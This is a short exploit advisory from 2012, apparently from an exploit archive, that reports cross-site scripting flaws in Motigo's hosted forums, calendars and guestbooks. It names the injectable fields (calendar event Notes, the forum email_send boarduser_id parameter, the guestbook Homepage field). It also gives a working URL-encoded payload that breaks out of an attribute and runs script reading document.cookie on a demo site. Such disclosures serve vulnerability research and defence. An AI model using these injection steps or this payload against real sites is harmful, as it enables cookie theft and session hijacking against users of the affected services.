Motigo Forums/Calendar/Guestbook Cross Site Scripting

`# Exploit Title: Motigo Forums/Calendar/Guestbook Cross Site Scripting  
# Date: 28.01.2012  
# Author: Sony  
# Software Link: http://motigo.com/  
# Web Browser : Mozilla Firefox  
# Blog : http://st2tea.blogspot.com  
# PoC:  
http://st2tea.blogspot.com/2012/01/motigo-forumscalendarguestbook-cross.html  
..................................................................  
  
Calendar:  
  
Create our calendar, add new event --> in the Notes put our xss code and  
add this event.  
  
Demo:  
  
http://36317.calendars.motigo.com/day/show/date/2012-01-28  
  
Forums:  
  
Our xss in the email_send.  
  
http://94932.forums.motigo.com/?action=email_send&boarduser_id= [our xss  
is here]  
  
Demo:  
  
http://94932.forums.motigo.com/?action=email_send&boarduser_id=%22%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3Cscript%3Ealert%28%22xss%22%29%3C/script%3E  
  
Guestbooks:  
  
Put our code in the Homepage and press button Submit.  
  
Demo:  
  
http://234402.guestbooks.motigo.com/?action=index  
`